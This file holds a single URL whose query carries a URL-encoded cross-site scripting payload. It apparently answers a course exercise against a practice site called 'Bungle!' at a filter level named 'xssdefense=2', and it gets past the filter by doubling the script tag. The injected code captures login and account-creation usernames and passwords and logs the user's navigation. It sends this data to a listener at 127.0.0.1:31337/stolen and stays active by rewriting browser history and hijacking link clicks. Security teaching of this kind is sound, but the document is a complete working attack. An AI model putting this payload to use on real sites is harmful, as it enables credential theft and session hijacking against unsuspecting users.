xss_2.txt

http://permalink.co/search?xssdefense=2&q=%3Csscriptcript%3Efunction%20payload(attacker)%20%7B%0A%09function%20log(data)%20%7B%0A%09%09console.log(%24.param(data))%0A%09%09%24.get(attacker%2C%20data)%3B%0A%09%7D%0A%09%2F%2F%20AW%3A%20helper%20function%20for%20the%20login%20form%20submission%20and%20account%20creation%0A%09%2F%2F%20param%3A%20the_event%20-%20type%3Dstring%3B%20either%20%22login%22%20or%20%22create%22%0A%09function%20post_helper(the_event)%7B%0A%09%09console.log(%22calling%20post_helper%22)%3B%0A%09%09var%20uname%20%3D%20document.getElementById(%22username%22).value%3B%0A%09%09var%20pword%20%3D%20document.getElementById(%22userpass%22).value%3B%0A%09%09%24.post(%22http%3A%2F%2Fpermalink.co%2F%22%20%2B%20the_event%2C%20%7Busername%3A%20uname%2C%20password%3A%20pword%7D%2C%20function()%7B%0A%09%09%09log(%7Bevent%3A%20the_event%2C%20user%3A%20uname%2C%20pass%3A%20pword%7D)%3B%0A%09%09%09proxy(%22http%3A%2F%2Fpermalink.co%2F%22)%3B%0A%09%09%7D)%3B%0A%09%7D%0A%09function%20back_helper(href)%7B%0A%09%09hist_stack.push(href)%3B%0A%09%09uid%2B%2B%3B%0A%09%09window.history.pushState(%7BUID%3A%20uid%7D%2C%22%22%2Chref)%3B%0A%09%7D%0A%09var%20hist_stack%20%3D%20new%20Array()%3B%0A%09var%20fwd_stack%20%3D%20new%20Array()%3B%0A%09var%20uid%20%3D%200%3B%0A%09var%20this_uid%3B%0A%09%2F%2Fvar%20prev_uid%3B%0A%09function%20proxy(href)%20%7B%0A%09%09%09%09%0A%09%09%09%2F%2Fhistory.replaceState(window.history.state%2C%20%22%22%2C%20href)%3B%0A%09%09%09if(window.history.state%20%3D%3D%20null)%0A%09%09%09%09history.replaceState(%7BUID%3A%20uid%7D%2C%22%22%2Chref)%3B%0A%09%09%09else%0A%09%09%09%09history.replaceState(window.history.state%2C%20%22%22%2C%20href)%3B%0A%09%09%09%0A%09%09%09this_uid%20%3D%20window.history.state.UID%3B%0A%09%09%09console.log(%22this_uid%3A%20%22%20%2B%20this_uid)%3B%0A%09%09%09console.log(%22hist_stack%3A%20%22%2C%20hist_stack)%3B%0A%09%09%09console.log(%22fwd_stack%3A%20%22%2C%20fwd_stack)%3B%0A%0A%09%09%24(%22html%22).load(href%2C%20function()%7B%0A%09%09%09%24(%22html%22).show()%3B%0A%0A%09%09%09var%20uname_elem%20%3D%20document.getElementById(%22logged-in-user%22)%3B%0A%09%09%09var%20user_name%3B%0A%09%09%09if(uname_elem%20!%3D%20null)%7B%0A%09%09%09%09user_name%20%3D%20uname_elem.innerHTML%3B%0A%09%09%09%7D%0A%09%09%09else%7B%0A%09%09%09%09user_name%20%3D%20null%3B%0A%09%09%09%7D%0A%0A%09%09%09%2F%2Fconsole.log(%22user_name%3A%20%22%20%2B%20user_name)%3B%0A%09%09%09log(%7Bevent%3A%20%22nav%22%2C%20user%3A%20user_name%2C%20uri%3A%20href%7D)%3B%0A%09%09%09%24(%22%23query%22).val(%22pwned!%22)%3B%0A%0A%09%09%09%2F%2F%20if%20we%27re%20on%20a%20search%20page%2C%20iterate%20through%20history%0A%09%09%09if(href.search(%22search%3F%22)%20!%3D%20-1)%7B%0A%09%09%09%09%24(%27a%27).each(function()%7B%0A%09%09%09%09%09%2F%2Fconsole.log(%22checking%20link%3A%20%22%2C%20%24(this).attr(%22href%22))%3B%0A%09%09%09%09%09if(%24(this).attr(%22href%22).indexOf(%22%253C%22)%20%3E%3D%200)%7B%0A%0A%09%09%09%09%09%09%2F%2F%20remove%20malicious-looking%20stuff%0A%09%09%09%09%09%09%24(this).remove()%3B%0A%09%09%09%09%09%09%2F%2Fconsole.log(%22remove%20called%22)%3B%0A%09%09%09%09%09%7D%0A%0A%09%09%09%09%09%2F%2F%20persist%20attack%20if%20they%20click%20on%20history%20links%0A%09%09%09%09%09%24(this).click(%22submit%22%2C%20function(event)%20%7B%0A%09%09%09%09%09%09usersSearch%20%3D%20%24(this).attr(%27href%27)%3B%0A%09%09%09%09%09%09%2F%2Flog(%22%23logged-in-user%22)%3B%0A%09%09%09%09%09%09event.preventDefault()%3B%0A%09%09%09%09%09%09proxy(%22http%3A%2F%2Fpermalink.co%2F%22%20%2B%20usersSearch)%3B%0A%09%09%09%09%09%7D)%3B%0A%0A%09%09%09%09%7D)%3B%0A%09%09%09%7D%0A%0A%09%09%09window.onpopstate%20%3D%20function(e)%7B%0A%09%09%09%09var%20next_uid%20%3D%20e.state.UID%3B%0A%09%09%09%09var%20top%3B%0A%09%09%09%09console.log(%22popstate%20detected%22)%3B%0A%09%09%09%09console.log(%22next_uid%3A%20%22%20%2B%20next_uid)%3B%0A%09%09%09%09%0A%09%09%09%09console.log(e)%3B%0A%09%09%09%09if(next_uid%20%3C%20this_uid)%7B%0A%09%09%09%09%09console.log(%22***************back%20button*******************%22)%3B%0A%09%09%09%09%09top%20%3D%20hist_stack.pop()%3B%0A%09%09%09%09%09fwd_stack.push(href)%3B%0A%09%09%09%09%09proxy(top)%3B%0A%09%09%09%09%7D%0A%09%09%09%09else%20%7B%0A%09%09%09%09%09console.log(%22****************forward%20button******************%22)%3B%0A%09%09%09%09%09top%20%3D%20fwd_stack.pop()%3B%0A%09%09%09%09%09hist_stack.push(href)%3B%0A%09%09%09%09%09proxy(top)%3B%0A%09%09%09%09%7D%0A%0A%09%09%09%7D%3B%0A%09%09%09%0A%0A%09%09%09%2F%2F%20Bungle!%20link%0A%09%09%09%24(%27%23bungle-lnk%27).on(%22click%22%2C%20function(event)%20%7B%0A%09%09%09%09event.preventDefault()%3B%0A%09%09%09%09back_helper(href)%3B%0A%09%09%09%09proxy(%22http%3A%2F%2Fpermalink.co%2F%22)%3B%0A%09%09%09%09%2F%2Falert(%22Bungle_link_alert%22)%3B%0A%09%09%09%7D)%3B%09%0A%0A%09%09%09%2F%2F%20Search%0A%09%09%09%24(%27form%5Baction%3D%22.%2Fsearch%22%5D%27).on(%22submit%22%2C%20function(event)%20%7B%0A%09%09%09%09usersSearch%20%3D%20document.getElementById(%27query%27).value%3B%0A%09%09%09%09event.preventDefault()%3B%0A%09%09%09%09back_helper(href)%3B%0A%09%09%09%09var%20target_link%20%3D%20%22http%3A%2F%2Fpermalink.co%2Fsearch%3Fq%3D%22%20%2B%20usersSearch%3B%0A%09%09%09%09proxy(target_link)%3B%0A%09%09%09%7D)%3B%0A%0A%09%09%09%2F%2F%20Search%20again%0A%09%09%09%24(%27%23search-again-btn%27).on(%22click%22%2C%20function(event)%20%7B%0A%09%09%09%09event.preventDefault()%3B%0A%09%09%09%09back_helper(href)%3B%0A%09%09%09%09proxy(%22http%3A%2F%2Fpermalink.co%2F%22)%3B%0A%09%09%09%09%2F%2Falert(%22Search_Again_button_alert%22)%3B%0A%09%09%09%7D)%3B%0A%0A%09%09%09%2F%2F%20login%0A%09%09%09%24(%27form%5Baction%3D%22.%2Flogin%22%5D%27).on(%22submit%22%2C%20function(event)%20%7B%0A%09%09%09%09event.preventDefault()%3B%0A%09%09%09%09post_helper(%22login%22)%3B%0A%09%09%09%09%2F%2Falert(%22login_form_alert%22)%3B%0A%0A%09%09%09%7D)%3B%0A%0A%09%09%09%2F%2F%20create%20account%0A%09%09%09%24(%27%23new-account-btn%27).on(%22click%22%2C%20function(event)%20%7B%0A%09%09%09%09event.preventDefault()%3B%0A%09%09%09%09post_helper(%22create%22)%3B%0A%09%09%09%09%2F%2Falert(%22create_account_alert%22)%3B%0A%09%09%09%7D)%3B%0A%0A%0A%09%09%09%2F%2F%20logout%0A%09%09%09%24(%27%23log-out-btn%27).on(%22click%22%2C%20function(event)%20%7B%0A%09%09%09%09event.preventDefault()%3B%0A%09%09%09%09var%20uname%20%3D%20document.getElementById(%22logged-in-user%22).innerHTML%3B%0A%09%09%09%09%2F%2Fconsole.log(%22uname%3A%20%22%20%2B%20uname)%3B%0A%09%09%09%09%24.post(%22http%3A%2F%2Fpermalink.co%2Flogout%22%2C%20function()%7B%0A%09%09%09%09%09log(%7Bevent%3A%20%22logout%22%2C%20user%3A%20uname%7D)%3B%0A%09%09%09%09%09proxy(%22http%3A%2F%2Fpermalink.co%2F%22)%3B%0A%09%09%09%09%7D)%3B%0A%09%09%09%7D)%3B%0A%0A%0A%09%09%7D)%3B%0A%0A%09%09%0A%09%7D%0A%09%24(%22html%22).hide()%3B%0A%09proxy(%22.%2F%22)%3B%0A%7D%3Bpayload(%22http%3A%2F%2F127.0.0.1%3A31337%2Fstolen%22)%3B%3C%2Fsscriptcript%3E